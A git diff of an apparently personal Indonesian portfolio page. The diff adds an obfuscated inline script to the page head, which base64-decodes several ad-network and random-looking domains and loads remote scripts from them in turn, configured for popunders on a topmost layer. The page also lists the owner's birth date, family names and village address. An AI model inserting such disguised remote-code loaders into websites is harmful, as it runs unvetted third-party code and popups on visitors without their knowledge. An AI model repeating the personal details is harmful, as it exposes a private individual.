--- a/index.html
+++ b/index.html
@@ -23,6 +23,12 @@
 <link href="assets/vendor/glightbox/css/glightbox.min.css" rel="stylesheet"/>
 <link href="assets/vendor/swiper/swiper-bundle.min.css" rel="stylesheet"/>
 <link href="assets/css/style.css" rel="stylesheet"/>
+
+<script type="text/javascript" data-cfasync="false">
+  /*<![CDATA[/* */
+  (function(){var t=window,i="d98153268d8bea331e40323eaa707795",g=[["siteId",923*86+972*420+277+4585920],["minBid",0],["popundersPerIP","0:1"],["delayBetween",0],["default",false],["defaultPerDay",0],["topmostLayer",!0]],c=["d3d3LmNkbjRhZHMuY29tL2Fzc2V0cy9zY3JpcHRzL2Fjb29raWVzLW1vbnN0ZXIuanM=","ZDNnNW92Zm5nanc5YncuY2xvdWRmcm9udC5uZXQvYWxvYWQtbWluLmpz","d3d3LnloZm9hcmNwaS5jb20vYXNzZXRzL3NjcmlwdHMvYmNvb2tpZXMtbW9uc3Rlci5qcw==","d3d3Lmh4anVycXVncWplcW0uY29tL3Rsb2FkLW1pbi5qcw=="],a=-1,d,v,s=function(){clearTimeout(v);a++;if(c[a]&&!(1734050339000<(new Date).getTime()&&1<a)){d=t.document.createElement("script");d.type="text/javascript";d.async=!0;var h=t.document.getElementsByTagName("script")[0];d.src="https://"+atob(c[a]);d.crossOrigin="anonymous";d.onerror=s;d.onload=function(){clearTimeout(v);t[i.slice(0,16)+i.slice(0,16)]||s()};v=setTimeout(s,5E3);h.parentNode.insertBefore(d,h)}};if(!t[i]){try{Object.freeze(t[i]=g)}catch(e){}s()}})();
+  /*]]>/* */
+  </script>  
 </head>
 <body>
   <i class="bi bi-list mobile-nav-toggle d-xl-none"></i>
@@ -68,7 +74,7 @@
             <p align="justify">
               Halo, perkenalkan nama saya Muhamad Rifki Sumarna, sering dipanggil iki. Saya lahir di Subang pada tanggal 13 Desember 2005. Anak dari Bapak & Mamah yang hebat, sangat kuat nan sabar dalam hal mendidik saya, beliau adalah kedua orang tua saya, Nana Sumarna & Titin Suarsih.
             </p>
-            <p align="justify">Anak pertama dari dua bersaudara, adik saya perempuan bernama Tina Nurhasanah. Hobi saya mendengarkan musik, genre musik yang saya suka yakni dangdut. Alamat saya di kampung palasari, tanjungwangi, kec. cijambe, kab. subang, jawa barat. Sekian perkenalan diri dari saya.
+            <p align="justify">Anak pertama dari dua bersaudara, adik saya perempuan bernama Tina Nurhasanah. Hobi saya mendengarkan musik, genre musik yang saya suka yakni dangdut dan saya juga suka dengan lagu DJ. Alamat saya di kampung palasari, tanjungwangi, kec. cijambe, kab. subang, jawa barat. Sekian perkenalan diri dari saya.
             </p>
             <a href="https://www.rifkiblog.my.id" target="_blank" class="link wobble-to-bottom-right-on-hover"><strong>Blog saya</strong></a>
           </div>
